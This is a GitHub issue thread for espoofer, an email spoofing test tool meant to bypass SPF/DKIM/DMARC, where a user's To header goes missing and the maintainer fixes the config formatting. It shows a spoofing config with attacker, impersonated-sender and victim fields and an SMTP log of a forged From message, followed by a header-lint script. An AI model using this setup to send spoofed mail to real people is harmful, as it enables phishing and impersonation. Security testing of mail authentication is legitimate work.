chenjj / espoofer

An email spoofing testing tool that aims to bypass SPF/DKIM/DMARC and forge DKIM signatures.🍻

Home Page: https://www.jianjunchen.com/p/composition-kills.USESEC20.pdf


Recipient email address not printed in mail client

ismokaka opened this issue · comments

Hi,
In server mode, with all test cases, when the email is received by the recipient, his email address is not printed (see picture below).
Tested on Gmail, Protonmail, Outlook and the behavior is still the same.
The config.py file is configured as described in the wiki.

image

Looks like the To header is missing in the message data. Please provide the full console log printed by espoofer so that I can help you.

Find below the full log printed (for privacy I replaced my own domain with XXX.YY):

Start sending emails...
Connecting ('45.55.104.203', 25)
>>> 220 12c7dd814f66 ESMTP Haraka/2.8.26 ready

<<< ehlo helo.XXX.YY

>>> 250-12c7dd814f66 Hello Unknown [127.0.0.1]Haraka is at your service.
250-PIPELINING
250-8BITMIME
250-SMTPUTF8
250 SIZE 16777000

<<< mail from: <any@mailfrom.notexist.mydomain.com>

>>> 250 sender <any@mailfrom.notexist.mydomain.com> OK

<<< rcpt to: <xinah68067@naymio.com>

>>> 250 recipient <xinah68067@naymio.com> OK

<<< data

>>> 354 go ahead, make my day

<<< From: <admin@mydomain.com>
<xinah68067@naymio.com>Testing EspooferDate: Fri, 12 Mar 2021 14:57:55 +0000
Content-Type: text/plain; charset="UTF-8"
MIME-Version: 1.0
Message-ID: <1538085644648.096e3d4e-bc38-4027-b57e-87A0AE@message-ids.XXX.YY>
X-Email-Client: https://github.com/chenjj/espoofer

Just Testing. Regards
.

>>> 250 Message Queued (754E166F-87AF-4545-BC73-CFCF419852C9.1)

<<< quit

>>> 221 12c7dd814f66 closing connection. Have a jolly good day.

Finished.

The config.py file is:

config = {
        "attacker_site": b"XXX.YY", # attack.com
        "legitimate_site_address": b"admin@mydomain.com", # From header address displayed to the end-user
        "victim_address": b"xinah68067@naymio.com", # RCPT TO and message.To header address, 
        "case_id": b"server_a1", #  You can find all case_id using -l option.

        # The following fields are optional
        "server_mode":{
                "recv_mail_server": "", # If no value, espoofer will query the victim_address to get the mail server
                "recv_mail_server_port": 25,
                "starttls": False,
        },
        "client_mode": {
                "sending_server": ("smtp.gmail.com", 587),
                "username": b"attacker@gmail.com",
                "password": b"",
        },

        # You can customize the email message header or body here
        "subject_header": b"Testing Espoofer", 
        "to_header": b"<xinah68067@naymio.com>",  #  e.g., <alice@example.com>
        "body": b"Just Testing. Regards",

        # Set the raw email message you want to send. It's used for replay attacks
        "raw_email": b"", 
}

Please try to change

        "subject_header": b"Testing Espoofer", 
        "to_header": b"<xinah68067@naymio.com>",  #  e.g., <alice@example.com>

to

        "subject_header": b"Subject: Testing Espoofer\r\n", 
        "to_header": b"To: <xinah68067@naymio.com>\r\n",  #  e.g., <alice@example.com>

It works now.
Thanks, we can close the issue.
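
A pre-flight check for the raw header fragments discussed in this thread, as an added example that is not part of the issue or of espoofer's code. `lint_raw_headers`, `assemble` and `header_names` are hypothetical helpers, and `assemble` assumes the fragments are concatenated verbatim, as the console log above suggests.

```python
import re

# Config keys that hold raw header fragments (key names from the config.py
# in the issue) and the field name each one is expected to carry.
RAW_HEADER_KEYS = {"subject_header": b"Subject", "to_header": b"To"}
FIELD_NAME = rb"[!-9;-~]+"  # printable ASCII except ':' (RFC 5322 field name)
# Exactly one header line: name, colon, value with no CR/LF, trailing CRLF.
HEADER_LINE = re.compile(rb"\A(" + FIELD_NAME + rb"):[ \t]*[^\r\n]*\r\n\Z")

def lint_raw_headers(config):
    """Return a list of problems found in the raw header fragments."""
    problems = []
    for key, expected in RAW_HEADER_KEYS.items():
        value = config.get(key, b"")
        m = HEADER_LINE.match(value)
        if m is None:  # missing name, missing CRLF, or an extra embedded line
            problems.append(f"{key}: not one 'Name: value\\r\\n' line: {value!r}")
        elif m.group(1).lower() != expected.lower():
            problems.append(f"{key}: field is {m.group(1)!r}, want {expected!r}")
    return problems

def assemble(config):
    """Hypothetical assembly: fragments concatenated verbatim (an assumption
    inferred from the console log in the issue, not espoofer's own code)."""
    return (b"From: <" + config["legitimate_site_address"] + b">\r\n"
            + config["to_header"] + config["subject_header"]
            + b"Date: Fri, 12 Mar 2021 14:57:55 +0000\r\n\r\n" + config["body"])

def header_names(message):
    """Field names a receiving parser can recognise in the header section."""
    head = message.split(b"\r\n\r\n", 1)[0]
    found = (re.match(rb"(" + FIELD_NAME + rb"):", line) for line in head.split(b"\r\n"))
    return [m.group(1) for m in found if m]

# Constructed sample configs, using the placeholder values from the issue.
BROKEN = {"legitimate_site_address": b"admin@mydomain.com",
          "subject_header": b"Testing Espoofer",
          "to_header": b"<xinah68067@naymio.com>",
          "body": b"Just Testing. Regards"}
FIXED = dict(BROKEN, subject_header=b"Subject: Testing Espoofer\r\n",
             to_header=b"To: <xinah68067@naymio.com>\r\n")

if __name__ == "__main__":
    for name, cfg in (("broken", BROKEN), ("fixed", FIXED)):
        print(name, lint_raw_headers(cfg), header_names(assemble(cfg)))
```

With the original values, the To and Subject text fuses into the line before `Date:`, so a receiving parser recognises only `From`; the same check also rejects a fragment that carries a second embedded header line.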